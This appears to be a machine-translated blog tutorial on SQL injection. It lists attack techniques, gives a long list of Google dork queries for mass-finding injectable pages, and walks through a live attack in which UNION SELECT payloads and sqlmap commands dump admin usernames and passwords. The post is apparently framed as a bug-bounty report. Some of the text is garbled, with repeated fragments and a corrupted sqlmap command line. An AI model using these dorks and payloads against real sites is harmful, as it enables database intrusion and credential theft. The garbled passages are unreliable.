What is SQL injection?
SQL injection is refers to the legitimacy of the web application to user input data without judgment or filtering is lax, the attacker can be defined in advance in the web application at the end of the query statement to add extra SQL statements, the administrator unwittingly illegal operation, in order to realize deceived any query of the database server to perform unauthorized, Thus further obtain the corresponding data information.
harm
Any application system developed using database, there may be a medium of SQL injection attack. SQL injection vulnerability has been one of the common security vulnerabilities since 1999. SQL injection vulnerability is still in the top 10 CVE list.
In 2011, THE US Department of Homeland Security, Mitre and SANA Institute identified SQL injection as the number one dangerous security vulnerability. So far, SQL injection is still the primary security threat vulnerability that is difficult to fix (it is difficult for database manufacturers to prevent SQL injection by maintaining database functions or improving database security policies).
In 2012, a Barclaycard representative claimed that 97% of data breaches were caused by SQL injections. In late 2011 and early 2012, in less than a month, more than a million web pages were subjected to SQL injection attacks. 2008 saw economic dislocation due to SQL injection. Even in the fall of 2010, the Official Website of the United Nations suffered an SQL injection attack.
In 2014, a hacking group called TeamDigi7al attacked a U.S. Navy Web app called Smart Web Move. As a direct result of this incident, the personal information of more than 220,000 service members in the US Navy database was compromised. The Navy later spent more than half a million dollars to cover the breach. NTT’s 2014 Global Threat Intelligence report puts forward a startling figure: “The average cost of a business to recover from a small SQL injection attack is typically more than $196,000.”
With the frequent occurrence of Web security incidents, we have to think about the cost of SQL injection attacks. Obviously, SQL injection is not an expired security issue. On the contrary, it is a very easy attack to use. SQL injection does not require sophisticated attacks to allow sensitive database information to be viewed or deleted illegally. In fact, because OF the simplicity and efficiency of SQL injection attacks, advanced hackers have begun to use software that automatically searches for SQL vulnerabilities in Web applications and SQL injection automation tools to create zombies and set up botnets that can be automatically attacked.
Obviously, SQL injection attacks are not going away anytime soon, and the impact is an urgent and costly threat, costing nearly $200,000 to handle a Web application security incident. It is important for network security engineers to realize that researching and defending against SQL injection attacks is a necessary and primary security task.
Injection technique
1. Blind annotation based on Boolean
Since web pages return True or False, Boolean blindness is a way to get database information based on the page return value after injection.
2. Blind annotation based on time
When a Boolean injection does not produce results (the page displays normally), it is difficult to determine whether the injected code was executed, or whether the injection point exists. At this point the Boolean injection will not work. The time – based blind injection comes into being. The so-called time – based blind injection is that we judge whether there is SQL injection point on the web page according to the corresponding time difference.
3. Federated Query Injection
The prerequisite for injection using federated queries is that the page we are injecting must have display bits. Union query injection is the use of union to merge the result sets of two or more SELECT statements, so two or more SELECT statements must have the same column and the same data type. Joint query injection can add order by 9 at the end of the link based on arbitrary numbers to determine the number of fields in the site based on the results returned from the page.
4. Injection based on error information
This method is not displayed on the page, but echo mysql_error(); A function can only be used if it outputs an error message. The advantage is that the injection is fast, the disadvantage is that the statement is more complex, and can only use limit to guess in turn. Echo mysql_error(); echo mysql_error(); echo mysql_error(); When an error message is displayed. There are many more omit 800 words here…
Information collection
First of all, it’s a metaphysical thing to dig holes. Why? I don’t know… Here are a few Google hacks you can use to bulk mine SQL vulnerabilities.
Inurl: / search_results. PHP search = inurl: 'Product. The asp? BigClassName inurl:Article_Print.asp? inurl:NewsInfo.asp? id= inurl:EnCompHonorBig.asp? id= inurl:NewsInfo.asp? id= inurl:ManageLogin.asp inurl:Offer.php? idf= inurl:Opinions.php? id= inurl:Page.php? id= inurl:Pop.php? id= inurl:Post.php? id= inurl:Prod_info.php? id= inurl:Product-item.php? id= inurl:Product.php? id= inurl:Product_ranges_view.php? ID= inurl:Productdetail.php? id= inurl:Productinfo.php? id= inurl:Produit.php? id= inurl:Profile_view.php? id= inurl:Publications.php? id= inurl:Stray-Questions-View.php? num= inurl:aboutbook.php? id= inurl:ages.php? id= inurl:announce.php? id= inurl:art.php? idm= inurl:article.php? ID= inurl:asp? id= inurl:avd_start.php? avd= inurl:band_info.php? id= inurl:buy.php? category= inurl:category.php? id= inurl:channel_id= inurl:chappies.php? id= inurl:clanek.php4? id= inurl:clubpage.php? id= inurl:collectionitem.php? id= inurl:communique_detail.php? id= inurl:curriculum.php? id= inurl:declaration_more.php? decl_id= inurl:detail.php? ID= inurl:download.php? id= inurl:downloads_info.php? id= inurl:event.php? id= inurl:faq2.php? id= inurl:fellows.php? id= inurl:fiche_spectacle.php? id= inurl:forum_bds.php? num= inurl:galeri_info.php? l= inurl:gallery.php? id= inurl:game.php? id= inurl:games.php? id= inurl:historialeer.php? num= inurl:hosting_info.php? id= inurl:humor.php? id=Copy the code
mining
When we dig holes full of information you’ll find my god there’s waF, it’s hard not to dig
First of all we don’t want to think we can dig!!
All right, back to business!!
When you find that the website has WAF how around all around the past don’t worry, film brother teach you SAO operation good good to learn, however the website has WAF we also around the past that we find the website did not
Waf place.
Look at this place. These four words, “Print this.” That’s right. There’s no WAF, no protection
And 1=2 If no information is returned, the value is false
And 1=1
The order by 29 field did not return information
Order by 28 returns the information that means the fields are 1-28
And then let’s guess that there’s a table called admin, Union select 1,2,3,4,5,6,7,4,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin There is no error in the database indicating that the admin table does exist in the database and we find injection points at 3,4,5,14 and then we try to guess the most common name of the admin table field
username
andpassword
, we are in3,4,5,14
Choose two of them and fill in eachusername
andpassword
Union select 1, 2, username, 4, password, 6,7,4,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 can be seen from admin page
The contents of the username and password fields in the admin table are returned
Good good
Let me show you how to use sqlMap again
First of all, SQLMap is the own script can be around waF these scripts are in the Tamper folder in detail will not talk about you can search the Internet
Sqlmap. py -u www.xxxx.com/Article_Print.asp?ArticleID=1182 - level 3Copy the code
Sqlmap. Py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 - DBSCopy the code
Yi! That’s what I did the first time I used the sqlmap, I got a bug but I didn’t see how the name of the database works, so if you look carefully you’ll see that the sqlmap gives you a hint… Good guy instantly thought of a word ye just afraid of missing…
Boy I cried straight away.
Sqlmap. Py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 - tablesCopy the code
Check it out. Check it out
Sqlmap. Py -u admin - http://www.xxxx.com/Article_Print.asp?ArticleID=1182 - T columns for admin list fields (tables (-t)Copy the code
img sqlmap.py -u http://www.xxxx.com/Article_Print.asp?ArticleID=1182 -T admin -C username,password -dump -dump -dump -dump -dump -dump -dump -dump -dump -c -c -c -c -c -C -C -C -C -C -C -C -C -C -C -C -C -C -C -C -C -CCopy the code
Wow, isn’t that nice?!
And finally, when your bug is ignored be sure to look at the reason for it when the reason for your omission is as unrepeatable as mineIf so, appeal (after all, I was deducted 27 points). Fortunately, the appeal was successful in the end, otherwise MY 27 points will be lost in vain